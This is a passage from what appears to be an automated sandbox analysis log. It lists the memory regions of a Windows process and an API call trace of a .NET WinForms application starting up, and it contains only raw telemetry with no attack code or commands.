monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007710000"
filename = ""
Region:
id = 559
start_va = 0x7810000
end_va = 0x790ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007810000"
filename = ""
Region:
id = 560
start_va = 0x49b0000
end_va = 0x49bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000049b0000"
filename = ""
Region:
id = 561
start_va = 0x49b0000
end_va = 0x49bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000049b0000"
filename = ""
Region:
id = 562
start_va = 0x7910000
end_va = 0x798ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007910000"
filename = ""
Region:
id = 563
start_va = 0x6bb20000
end_va = 0x6bc92fff
monitored = 0
entry_point = 0x6bbcd220
region_type = mapped_file
name = "windowscodecs.dll"
filename = "\\Windows\\SysWOW64\\WindowsCodecs.dll" (normalized: "c:\\windows\\syswow64\\windowscodecs.dll")
Region:
id = 564
start_va = 0x7990000
end_va = 0x79e3fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007990000"
filename = ""
Region:
id = 565
start_va = 0x79f0000
end_va = 0x7a1ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000079f0000"
filename = ""
Region:
id = 566
start_va = 0x79f0000
end_va = 0x79fffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000079f0000"
filename = ""
Region:
id = 567
start_va = 0x7a00000
end_va = 0x7a0ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000007a00000"
filename = ""
Region:
id = 568
start_va = 0x7a10000
end_va = 0x7a1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000007a10000"
filename = ""
Region:
id = 569
start_va = 0x49c0000
end_va = 0x49cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000049c0000"
filename = ""
Region:
id = 570
start_va = 0x49c0000
end_va = 0x49cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000049c0000"
filename = ""
Region:
id = 571
start_va = 0x49d0000
end_va = 0x49dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000049d0000"
filename = ""
Region:
id = 572
start_va = 0x7a20000
end_va = 0x7a87fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000007a20000"
filename = ""
Region:
id = 573
start_va = 0x49c0000
end_va = 0x49cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000049c0000"
filename = ""
Region:
id = 574
start_va = 0x49c0000
end_va = 0x49cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000049c0000"
filename = ""
Region:
id = 575
start_va = 0x49c0000
end_va = 0x49cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000049c0000"
filename = ""
Region:
id = 576
start_va = 0x49c0000
end_va = 0x49cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000049c0000"
filename = ""
Region:
id = 577
start_va = 0x49c0000
end_va = 0x49cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000049c0000"
filename = ""
Region:
id = 578
start_va = 0x49c0000
end_va = 0x49cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000049c0000"
filename = ""
Region:
id = 579
start_va = 0x4bb0000
end_va = 0x4bbffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004bb0000"
filename = ""
Region:
id = 580
start_va = 0x4bb0000
end_va = 0x4bbffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004bb0000"
filename = ""
Region:
id = 581
start_va = 0x4bb0000
end_va = 0x4bbffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004bb0000"
filename = ""
Region:
id = 582
start_va = 0x49c0000
end_va = 0x49cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000049c0000"
filename = ""
Region:
id = 583
start_va = 0x49c0000
end_va = 0x49cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000049c0000"
filename = ""
Region:
id = 584
start_va = 0x49c0000
end_va = 0x49cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000049c0000"
filename = ""
Region:
id = 585
start_va = 0x49c0000
end_va = 0x49cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000049c0000"
filename = ""
Region:
id = 586
start_va = 0x49c0000
end_va = 0x49cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000049c0000"
filename = ""
Region:
id = 587
start_va = 0x49c0000
end_va = 0x49cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000049c0000"
filename = ""
Region:
id = 588
start_va = 0x49c0000
end_va = 0x49cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000049c0000"
filename = ""
Region:
id = 589
start_va = 0x4bb0000
end_va = 0x4bbffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004bb0000"
filename = ""
Region:
id = 590
start_va = 0x49c0000
end_va = 0x49cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000049c0000"
filename = ""
Region:
id = 591
start_va = 0x4bb0000
end_va = 0x4bbffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004bb0000"
filename = ""
Region:
id = 592
start_va = 0x7a90000
end_va = 0x7a9ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007a90000"
filename = ""
Region:
id = 593
start_va = 0x7a90000
end_va = 0x7a9ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007a90000"
filename = ""
Region:
id = 594
start_va = 0x7aa0000
end_va = 0x7aaffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007aa0000"
filename = ""
Region:
id = 595
start_va = 0x7aa0000
end_va = 0x7aaffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007aa0000"
filename = ""
Region:
id = 596
start_va = 0x7ab0000
end_va = 0x7abffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007ab0000"
filename = ""
Region:
id = 597
start_va = 0x7ab0000
end_va = 0x7abffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007ab0000"
filename = ""
Region:
id = 598
start_va = 0x7ab0000
end_va = 0x7abffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007ab0000"
filename = ""
Region:
id = 599
start_va = 0x7ac0000
end_va = 0x7acffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007ac0000"
filename = ""
Region:
id = 600
start_va = 0x7ad0000
end_va = 0x7adffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007ad0000"
filename = ""
Region:
id = 601
start_va = 0x7ae0000
end_va = 0x7aeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007ae0000"
filename = ""
Region:
id = 602
start_va = 0x7af0000
end_va = 0x7afffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007af0000"
filename = ""
Region:
id = 603
start_va = 0x7b00000
end_va = 0x7b0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007b00000"
filename = ""
Region:
id = 604
start_va = 0x7b10000
end_va = 0x7b1ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007b10000"
filename = ""
Region:
id = 605
start_va = 0x49c0000
end_va = 0x49cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000049c0000"
filename = ""
Region:
id = 606
start_va = 0x49c0000
end_va = 0x49cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000049c0000"
filename = ""
Region:
id = 607
start_va = 0x49c0000
end_va = 0x49cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000049c0000"
filename = ""
Region:
id = 608
start_va = 0x4bb0000
end_va = 0x4bbffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004bb0000"
filename = ""
Region:
id = 609
start_va = 0x7a90000
end_va = 0x7acffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007a90000"
filename = ""
Region:
id = 610
start_va = 0x7ad0000
end_va = 0x7bcffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007ad0000"
filename = ""
Region:
id = 611
start_va = 0x49c0000
end_va = 0x49cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000049c0000"
filename = ""
Region:
id = 612
start_va = 0x4bb0000
end_va = 0x4bbffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004bb0000"
filename = ""
Region:
id = 613
start_va = 0x7bd0000
end_va = 0x7bdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007bd0000"
filename = ""
Region:
id = 614
start_va = 0x49c0000
end_va = 0x49cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000049c0000"
filename = ""
Region:
id = 615
start_va = 0x7bd0000
end_va = 0x8bcffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007bd0000"
filename = ""
Region:
id = 616
start_va = 0x8bd0000
end_va = 0x8daffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008bd0000"
filename = ""
Region:
id = 617
start_va = 0x8db0000
end_va = 0x9daffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008db0000"
filename = ""
Region:
id = 618
start_va = 0x9db0000
end_va = 0xa16ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000009db0000"
filename = ""
Region:
id = 619
start_va = 0xa170000
end_va = 0xa188fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000000a170000"
filename = ""
Region:
id = 620
start_va = 0x49c0000
end_va = 0x49cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000049c0000"
filename = ""
Region:
id = 621
start_va = 0x4bb0000
end_va = 0x4bbffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004bb0000"
filename = ""
Region:
id = 622
start_va = 0xa190000
end_va = 0xa19ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a190000"
filename = ""
Region:
id = 623
start_va = 0xa190000
end_va = 0xb18ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a190000"
filename = ""
Region:
id = 624
start_va = 0xb190000
end_va = 0xc18ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000b190000"
filename = ""
Region:
id = 625
start_va = 0x2120000
end_va = 0x212ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002120000"
filename = ""
Region:
id = 626
start_va = 0x2130000
end_va = 0x213ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002130000"
filename = ""
Region:
id = 627
start_va = 0x2140000
end_va = 0x214ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002140000"
filename = ""
Region:
id = 628
start_va = 0x2150000
end_va = 0x215ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002150000"
filename = ""
Region:
id = 629
start_va = 0x2160000
end_va = 0x216ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002160000"
filename = ""
Region:
id = 630
start_va = 0x2170000
end_va = 0x217ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002170000"
filename = ""
Region:
id = 631
start_va = 0x2180000
end_va = 0x218ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002180000"
filename = ""
Region:
id = 632
start_va = 0x2120000
end_va = 0x212ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002120000"
filename = ""
Region:
id = 633
start_va = 0x2120000
end_va = 0x212ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002120000"
filename = ""
Region:
id = 634
start_va = 0x2120000
end_va = 0x212ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002120000"
filename = ""
Region:
id = 635
start_va = 0x2120000
end_va = 0x212ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002120000"
filename = ""
Region:
id = 636
start_va = 0x2120000
end_va = 0x212ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002120000"
filename = ""
Region:
id = 637
start_va = 0x2120000
end_va = 0x212ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002120000"
filename = ""
Region:
id = 638
start_va = 0x2120000
end_va = 0x212ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002120000"
filename = ""
Region:
id = 639
start_va = 0x2120000
end_va = 0x212ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002120000"
filename = ""
Region:
id = 640
start_va = 0x2120000
end_va = 0x212ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002120000"
filename = ""
Region:
id = 641
start_va = 0x2130000
end_va = 0x213ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002130000"
filename = ""
Region:
id = 642
start_va = 0x2120000
end_va = 0x212ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002120000"
filename = ""
Region:
id = 643
start_va = 0x2120000
end_va = 0x212ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002120000"
filename = ""
Region:
id = 644
start_va = 0x2120000
end_va = 0x212ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002120000"
filename = ""
Region:
id = 645
start_va = 0x2120000
end_va = 0x212ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002120000"
filename = ""
Region:
id = 646
start_va = 0x2120000
end_va = 0x212ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002120000"
filename = ""
Region:
id = 647
start_va = 0x2120000
end_va = 0x212ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002120000"
filename = ""
Region:
id = 648
start_va = 0x2120000
end_va = 0x212ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002120000"
filename = ""
Region:
id = 649
start_va = 0x2140000
end_va = 0x214ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002140000"
filename = ""
Region:
id = 650
start_va = 0x2120000
end_va = 0x212ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002120000"
filename = ""
Region:
id = 651
start_va = 0x6fc60000
end_va = 0x6fdaafff
monitored = 0
entry_point = 0x6fcc1660
region_type = mapped_file
name = "propsys.dll"
filename = "\\Windows\\SysWOW64\\propsys.dll" (normalized: "c:\\windows\\syswow64\\propsys.dll")
Region:
id = 652
start_va = 0x2120000
end_va = 0x2120fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002120000"
filename = ""
Region:
id = 653
start_va = 0x2140000
end_va = 0x217ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002140000"
filename = ""
Region:
id = 654
start_va = 0x7bd0000
end_va = 0x7ccffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007bd0000"
filename = ""
Region:
id = 655
start_va = 0x74340000
end_va = 0x743c3fff
monitored = 0
entry_point = 0x74366220
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll")
Region:
id = 656
start_va = 0x6fa40000
end_va = 0x6fc5bfff
monitored = 0
entry_point = 0x6fc0bc40
region_type = mapped_file
name = "actxprxy.dll"
filename = "\\Windows\\SysWOW64\\actxprxy.dll" (normalized: "c:\\windows\\syswow64\\actxprxy.dll")
Region:
id = 657
start_va = 0x2180000
end_va = 0x2180fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002180000"
filename = ""
Region:
id = 658
start_va = 0x7cd0000
end_va = 0x7d0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007cd0000"
filename = ""
Region:
id = 659
start_va = 0x7d10000
end_va = 0x7e0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007d10000"
filename = ""
Region:
id = 660
start_va = 0x2190000
end_va = 0x2193fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 661
start_va = 0x7e10000
end_va = 0x7e54fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000c.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000000c.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000c.db")
Region:
id = 662
start_va = 0x21a0000
end_va = 0x21a3fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 663
start_va = 0x7e60000
end_va = 0x7eedfff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db")
Region:
id = 664
start_va = 0x7ef0000
end_va = 0x7f00fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "propsys.dll.mui"
filename = "\\Windows\\SysWOW64\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\propsys.dll.mui")
Region:
id = 665
start_va = 0x21b0000
end_va = 0x21b3fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "cversions.1.db"
filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db")
Region:
id = 666
start_va = 0x7f10000
end_va = 0x7f23fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000016.db"
filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000016.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000016.db")
Region:
id = 667
start_va = 0x4bb0000
end_va = 0x4bb0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000004bb0000"
filename = ""
Region:
id = 668
start_va = 0x7f30000
end_va = 0x802ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007f30000"
filename = ""
Region:
id = 669
start_va = 0x8030000
end_va = 0x806ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008030000"
filename = ""
Region:
id = 670
start_va = 0x8070000
end_va = 0x816ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008070000"
filename = ""
Region:
id = 671
start_va = 0x717a0000
end_va = 0x7191dfff
monitored = 0
entry_point = 0x7181c630
region_type = mapped_file
name = "urlmon.dll"
filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll")
Region:
id = 672
start_va = 0x73b80000
end_va = 0x73e4afff
monitored = 0
entry_point = 0x73dbc4c0
region_type = mapped_file
name = "iertutil.dll"
filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll")
Region:
id = 673
start_va = 0x21b0000
end_va = 0x21b0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000021b0000"
filename = ""
Region:
id = 1157
start_va = 0x7a90000
end_va = 0x7a9ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007a90000"
filename = ""
Region:
id = 1158
start_va = 0x7aa0000
end_va = 0x7aaffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007aa0000"
filename = ""
Region:
id = 1159
start_va = 0x7ab0000
end_va = 0x7abffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007ab0000"
filename = ""
Region:
id = 1160
start_va = 0x7ac0000
end_va = 0x7acffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007ac0000"
filename = ""
Region:
id = 1186
start_va = 0x7a90000
end_va = 0x7acffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007a90000"
filename = ""
Region:
id = 1187
start_va = 0x7ad0000
end_va = 0x7bcffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007ad0000"
filename = ""
Region:
id = 1188
start_va = 0x8170000
end_va = 0x817ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008170000"
filename = ""
Region:
id = 1189
start_va = 0x8170000
end_va = 0x826ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008170000"
filename = ""
Region:
id = 1190
start_va = 0x8270000
end_va = 0x82affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008270000"
filename = ""
Region:
id = 1191
start_va = 0x82b0000
end_va = 0x83affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000082b0000"
filename = ""
Thread:
id = 1
os_tid = 0x1394
[0133.207] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0
[0134.124] RoInitialize () returned 0x1
[0134.125] RoUninitialize () returned 0x0
[0137.534] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLNAME") returned 0xc1db
[0137.534] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLTYPE") returned 0xc14b
[0137.570] GetSystemMetrics (nIndex=75) returned 1
[0137.610] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x0
[0138.429] LoadLibraryW (lpLibFileName="comctl32.dll") returned 0x6c550000
[0138.495] AdjustWindowRectEx (in: lpRect=0x19efdc, dwStyle=0x56cf0000, bMenu=0, dwExStyle=0x50001 | out: lpRect=0x19efdc) returned 1
[0138.499] GetCurrentProcess () returned 0xffffffff
[0138.499] GetCurrentThread () returned 0xfffffffe
[0138.499] GetCurrentProcess () returned 0xffffffff
[0138.499] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x19eef4, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x19eef4*=0x27c) returned 1
[0138.504] GetCurrentThreadId () returned 0x1394
[0138.516] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6c550000
[0138.529] GetModuleHandleW (lpModuleName="user32.dll") returned 0x743d0000
[0138.529] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="DefWindowProcW", cchWideChar=14, lpMultiByteStr=0x19ed18, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DefWindowProcW\x87lFR¤(ú oÌñ\x19", lpUsedDefaultChar=0x0) returned 14
[0138.529] GetProcAddress (hModule=0x743d0000, lpProcName="DefWindowProcW") returned 0x73e807e0
[0138.530] GetStockObject (i=5) returned 0x1900015
[0138.535] GetModuleHandleW (lpModuleName=0x0) returned 0x400000
[0138.544] CoTaskMemAlloc (cb=0x5c) returned 0x85bc78
[0138.544] RegisterClassW (lpWndClass=0x19ed08) returned 0xc1dc
[0138.545] CoTaskMemFree (pv=0x85bc78)
[0138.546] GetModuleHandleW (lpModuleName=0x0) returned 0x400000
[0138.546] CreateWindowExW (dwExStyle=0x0, lpClassName="WindowsForms10.Window.8.app.0.1ca0192_r10_ad1", lpWindowName=0x0, dwStyle=0x2010000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0xfffffffd, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x8023a
[0138.549] SetWindowLongW (hWnd=0x8023a, nIndex=-4, dwNewLong=1944586208) returned 79431102
[0138.550] GetWindowLongW (hWnd=0x8023a, nIndex=-4) returned 1944586208
[0138.557] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\.NETFramework", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e56c | out: phkResult=0x19e56c*=0x280) returned 0x0
[0138.558] RegQueryValueExW (in: hKey=0x280, lpValueName="DbgJITDebugLaunchSetting", lpReserved=0x0, lpType=0x19e58c, lpData=0x0, lpcbData=0x19e588*=0x0 | out: lpType=0x19e58c*=0x0, lpData=0x0, lpcbData=0x19e588*=0x0) returned 0x2
[0138.558] RegQueryValueExW (in: hKey=0x280, lpValueName="DbgManagedDebugger", lpReserved=0x0, lpType=0x19e58c, lpData=0x0, lpcbData=0x19e588*=0x0 | out: lpType=0x19e58c*=0x0, lpData=0x0, lpcbData=0x19e588*=0x0) returned 0x2
[0138.559] RegCloseKey (hKey=0x280) returned 0x0
[0138.564] SetWindowLongW (hWnd=0x8023a, nIndex=-4, dwNewLong=79431142) returned 1944586208
[0138.564] GetWindowLongW (hWnd=0x8023a, nIndex=-4) returned 79431142
[0138.564] GetWindowLongW (hWnd=0x8023a, nIndex=-16) returned 113311744
[0138.587] RegisterClipboardFormatW (lpszFormat="WinFormsMouseEnter") returned 0xc1e5
[0138.587] CallWindowProcW (lpPrevWndFunc=0x73e807e0, hWnd=0x8023a, Msg=0x24, wParam=0x0, lParam=0x19e884) returned 0x0
[0138.588] RegisterClipboardFormatW (lpszFormat="WinFormsUnSubclass") returned 0xc1e4
[0138.588] CallWindowProcW (lpPrevWndFunc=0x73e807e0, hWnd=0x8023a, Msg=0x81, wParam=0x0, lParam=0x19e878) returned 0x1
[0138.589] CallWindowProcW (lpPrevWndFunc=0x73e807e0, hWnd=0x8023a, Msg=0x83, wParam=0x0, lParam=0x19e864) returned 0x0
[0138.879] CallWindowProcW (lpPrevWndFunc=0x73e807e0, hWnd=0x8023a, Msg=0x1, wParam=0x0, lParam=0x19e878) returned 0x0
[0138.880] GetClientRect (in: hWnd=0x8023a, lpRect=0x19e5a4 | out: lpRect=0x19e5a4) returned 1
[0138.880] GetWindowRect (in: hWnd=0x8023a, lpRect=0x19e5a4 | out: lpRect=0x19e5a4) returned 1
[0138.882] GetParent (hWnd=0x8023a) returned 0x0
[0139.090] EtwEventRegister (in: ProviderId=0x2242760, EnableCallback=0x4bc060e, CallbackContext=0x0, RegHandle=0x224273c | out: RegHandle=0x224273c) returned 0x0
[0139.094] EtwEventSetInformation (RegHandle=0x847538, InformationClass=0x27, EventInformation=0x2, InformationLength=0x22426d0) returned 0x0
[0139.097] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6c550000
[0139.098] AdjustWindowRectEx (in: lpRect=0x19ebec, dwStyle=0x5601008d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19ebec) returned 1
[0139.101] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6c550000
[0139.101] AdjustWindowRectEx (in: lpRect=0x19ebec, dwStyle=0x5601008d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19ebec) returned 1
[0139.104] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6c550000
[0139.104] AdjustWindowRectEx (in: lpRect=0x19ebec, dwStyle=0x5601008d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19ebec) returned 1
[0139.106] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6c550000
[0139.106] AdjustWindowRectEx (in: lpRect=0x19ebec, dwStyle=0x5601008d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19ebec) returned 1
[0139.109] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6c550000
[0139.109] AdjustWindowRectEx (in: lpRect=0x19ebec, dwStyle=0x5601008d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19ebec) returned 1
[0139.114] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6c550000
[0139.114] AdjustWindowRectEx (in: lpRect=0x19ebec, dwStyle=0x5601008d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19ebec) returned 1
[0139.117] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6c550000
[0139.117] AdjustWindowRectEx (in: lpRect=0x19ebec, dwStyle=0x5601008d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19ebec) returned 1
[0139.121] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6c550000
[0139.121] AdjustWindowRectEx (in: lpRect=0x19ebe8, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19ebe8) returned 1
[0139.127] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6c550000
[0139.128] AdjustWindowRectEx (in: lpRect=0x19ebe8, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19ebe8) returned 1
